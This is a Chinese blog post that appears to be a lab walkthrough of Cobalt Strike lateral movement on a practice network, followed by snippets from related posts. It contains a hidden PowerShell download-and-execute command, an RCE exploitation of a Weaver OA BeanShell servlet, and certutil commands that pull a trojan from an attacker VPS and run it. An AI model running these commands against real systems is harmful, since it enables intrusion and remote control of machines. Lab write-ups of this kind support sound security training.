cs在内网横向的使用(靶机)

最新推荐文章于 2024-06-21 16:41:46 发布
最新推荐文章于 2024-06-21 16:41:46 发布
阅读量1.5k 收藏 3
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/121106811
版权

在这里插入图片描述

1.cs上线目标

(1)设置监听器

在这里插入图片描述
在这里插入图片描述
添加监听
在这里插入图片描述

(2) 上线目标

如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块
在这里插入图片描述
根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口
在这里插入图片描述
复制代码(这里要选择x64的payload)

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"

在这里插入图片描述
直接在目标上执行该代码
在这里插入图片描述
在这里插入图片描述

上线成功

2.收集信息(内网)

shell ipconfig /all

在这里插入图片描述
使用 portscan 快速探测内网

portscan 192.168.1.115-192.168.1.125 445,3389,80,443 arp 20

在这里插入图片描述
发现内网中存在web服务器 192.168.1.123

在主机192.168.1.118 中架设内网代理,通过代理访问 192.168.1.123:80
在这里插入图片描述
在这里插入图片描述
通过视图菜单查看我们架设的代理服务器
在这里插入图片描述

在这里插入图片描述
通过火狐浏览器设置代理服务器
在这里插入图片描述
成功访问到目标内网web
在这里插入图片描述
通过查找该oa的漏洞信息,发现该OA存在RCE漏洞,直接通过该漏洞可以获得权限

http://192.168.1.123/weaver/bsh.servlet.BshServlet/
在这里插入图片描述
漏洞存在,可正常执行

漏洞利用
可以通过系统自带的下载程序,远程下载木马到本地,然后通过exec调用cmd执行该木马程序,上线cs
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

上传木马至公网vps,通过python 直接开启httpweb
在这里插入图片描述

下载木马

exec("cmd /c certutil -urlcache -split -f http://ip:8089/sweetie.exe")

在这里插入图片描述
出现get 请求说明目标正在执行下载
在这里插入图片描述
执行木马

exec("cmd /c sweetie.exe")

目标成功上线
在这里插入图片描述
在这里插入图片描述
继续信息收集,发现目标存在双网卡,同时也发现目标第二层内网
在这里插入图片描述
发现主机 172.16.1.119 开放web,架设内网代理访问
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Sweetie_x
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
web渗透测试靶机(新手)
05-07
在学习和使用这些靶机时,你需要掌握以下知识点: 1. **HTTP协议基础**:理解请求和响应的结构,以及GET、POST等请求方法。 2. **Web应用架构**:了解基本的Web应用架构,如PHP、ASP.NET、Java等后端开发语言。 3. ...
内网横向渗透神器-CS
qq_39756628的博客
06-22 2439
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
CS和MSF联动实现内网横向移动
wuxinweii的博客
10-21 1448
CS和MSF联动实现内网横向移动 ** 实验要求:外网vps一台 cs服务器 msf工具 已经成功拿到shell** 一、使用cs生成EXE文件上传到目标主机直接上线 *1.先使用cs生成一个监听器来监听EXE连接回来的端口 主要配置payload类型和监听主机IP和端口 2.生成一个exe可执行文件 主要配置监听器和类型类型 3.将文件上传到目标直接执行 4.上线成功 二、扫描内网中的其他主机 1.使用cs的portcan模块来进行内网其他机器扫描 2.扫描完成后发现内网有很多主机,而这次的目标
不出网上线CS的各种姿势(内网横向
最新发布
qq_64395221的博客
06-21 1122
内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link <ip>)去连接它。经常是拿下一台边缘机器,其有多块网卡,用于连接内外网,内网机器都不出网。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。一样,建立pystinger连接之后,直接生成payload在业务主机执行,业务内网主机192.168.111.236即可成功上线。
使用cs与msf进行内网横向移动
qq_46635165的博客
10-10 4609
使用cs与msf进行内网横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内网 1, 将目标上线至CS 2, 使用cs探测内网信息 查看当前目标系统网络情况,确认目标系统所在内网网段 3, 使用cs的portscan功能对内网进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内网横向移动 对当前目标系统所获取
内网安全】——CS操作指南(二)
Demo不是emo的博客
02-03 4032
cs操作指南三部曲第二部——cs功能讲解
内网安全】——CS操作指南(一)
qq_53058639的博客
01-26 207
作者名:白昼安全主页面链接:创作初心: 一切为了她座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日emo: 再让我多赚一点——《血战网安岭》!CS 是CobaltStrike的简称,是一款神器,常被业界人称为CS神器。CobaltStrike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
vulnhub靶机实战-My-cmsms靶机
09-29
在本例中,我们使用nmap命令来扫描靶机的开放端口,得到其开放的端口有22、80、3306、33060等。 服务版本识别 服务版本识别是指通过扫描目标主机的开放端口来获知其服务的版本信息。在本例中,我们使用nmap命令来...
攻击机和靶机使用说明:kali linux和OWAS详细使用教程.pdf
04-14
攻击机和靶机使用说明:kali linux和OWAS详细使用教程 网卡的详细配置 ## WEB服务器OWASP靶机 ### 下载地址:https://sourceforge.net/projects/owaspbwa/files/ ### web apps: http://192.168.0.113/ #### ...
CS内网横向移动实验
Innocence_0的博客
01-29 901
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。**攻击者win10地址:**192.168.8.3。攻击者充当CS客户端连接。
cs和msf实现内网横向移动3
wuxinweii的博客
11-02 1593
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个网段,这次通过172.16.1.123拿到172.16.1.119的权限 一、通过172.16.1.123确定172.16.1.119为域控 因为是靶机,所以知道了172.16.1.119为域控 二、通过proxychain代理流量进内网 因为vps无法直接访问到172.16.1.119,所以可以通过172.16.1.123生成一个代理端口来代理流量进入这个网段 1.下载proxychain 参考文章:https://
cs内网靶机练习(上)
qq_45300786的博客
09-25 1461
通过dumpfile函数导出数据到一个文件。 (把数据导入到一个叫123.php的文件) 访问这个写入的木马成功。 本地测试 注:在mysql的高版本或者正常版本中,是不允许使用dumpfile函数、outfile函数的和load_file函数的 详细说明请参考这个https://www.cnblogs.com/zztac/p/11371149.html 堆叠注入,就是多行注入 靶机演示 先传参一些乱七八糟的东西,使它爆出绝对路径。 然后通过导出函数写入文 ?id=1 and 1=2 un..
内网工具 CS的基础使用
m0_57856283的博客
03-12 7160
1 powershell 技术 1.1powershell 简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 Windows PowerShell v3 将伴随着 Microsoft Hyper-V 3.0 和 Windows...
Linux横向CSK靶机攻防
Fly_鹏程万里
10-10 1129
文章前言 本篇文章主要以CSK靶机为例来介绍Linux环境下的外网渗透与内网渗透实例,当然本篇文章仅以当前实例为例,在实战中需结合具体的环境进行渗透 靶机下载 https://secplanet.sfo2.cdn.digitaloceanspaces.com/THP-csk-lab.zip 环境搭建 在开始菜单,依次点击编辑 ->虚拟网络编辑器-> 更改设置,之后选择需要设置NAT类型的界面,修改子网IP为172.16.250.0 ,并点击应用 之后用VMware Works
内网信息收集——利用cs手动收集
m0_51957299的博客
09-06 139
内网信息收集详细!!!!!!
Powershell免杀
mingyqf的博客
05-11 2419
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
我的powershell免杀之路
mingyqf的博客
05-17 1921
我的powershell免杀之路 ​ 原创 tubai
owasp靶机使用教程
09-10
OWASP靶机是一种用于进行web漏洞实验的Java靶场程序,用来演示和实验web应用中存在的安全漏洞。它可以帮助用户学习和理解跨站点脚本攻击、访问控制、线程安全、操纵隐藏字段、操纵参数、弱会话cookie、SQL注入等多个web安全知识点。 安装OWASP靶机的步骤如下: 1. 首先,您需要下载OWASP和vmware。OWASP是一个开放的网络应用安全项目,而vmware是虚拟机软件。 2. 其次,安装好vmware虚拟机软件后,您可以在虚拟机中运行OWASP靶机。 以上是OWASP靶机的简单下载和安装过程,安装完成后,您可以开始学习和练习webgoat渗透环境,并记录学习过程。希望这对您有所帮助!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值